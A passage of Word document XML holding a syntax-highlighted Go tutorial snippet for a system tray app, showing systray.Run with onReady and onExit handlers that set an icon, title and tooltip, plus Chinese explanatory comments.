        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ioutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>WriteFile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>`on_exit_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0037A6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>%d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.txt`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>UnixNano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()), []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">()), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="1750EB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>0644</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="286D73"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>onReady</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>onExit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="286D73"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>onReady</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTemplateIcon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>托盘名称，暂时未看到效果，不清楚该字符串显示在哪里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Awesome App"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>鼠标指针移动，默认显示字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTooltip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Lantern"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
